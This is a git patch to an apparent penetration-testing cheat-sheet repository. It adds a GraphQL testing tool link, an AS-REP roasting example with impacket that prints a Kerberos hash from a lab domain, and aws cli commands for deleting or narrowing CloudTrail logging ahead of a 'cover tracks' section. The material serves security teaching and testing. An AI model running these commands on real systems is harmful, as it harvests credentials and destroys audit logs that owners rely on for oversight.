From 95ab07b45eccbd57c00a889328187ba6356ec6f4 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 28 Mar 2020 12:01:56 +0100 Subject: [PATCH] CloudTrail disable, GraphQL tool --- GraphQL Injection/README.md | 1 + .../Active Directory Attack.md | 7 +++++++ .../Cloud - AWS Pentest.md | 19 +++++++++++++++++++ 3 files changed, 27 insertions(+) diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 3a9883b..3719113 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -24,6 +24,7 @@ * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap) * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) +* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) ## Exploit diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 395c02f..0da35ca 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -771,6 +771,13 @@ C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast Using `impacket` to get the hash and `hashcat` to crack it. ```powershell +# example +$ python GetNPUsers.py htb.local/svc-alfresco -no-pass +Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation + +[*] Getting TGT for svc-alfresco +$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4 + # extract hashes root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 904f7d8..2342c2b 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -474,6 +474,25 @@ Prerequisite: 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path +## Disable CloudTrail + +```powershell +$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator +``` + +Disable monitoring of events from global services + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event +``` + +Disable Cloud Trail on specific regions + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + + ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.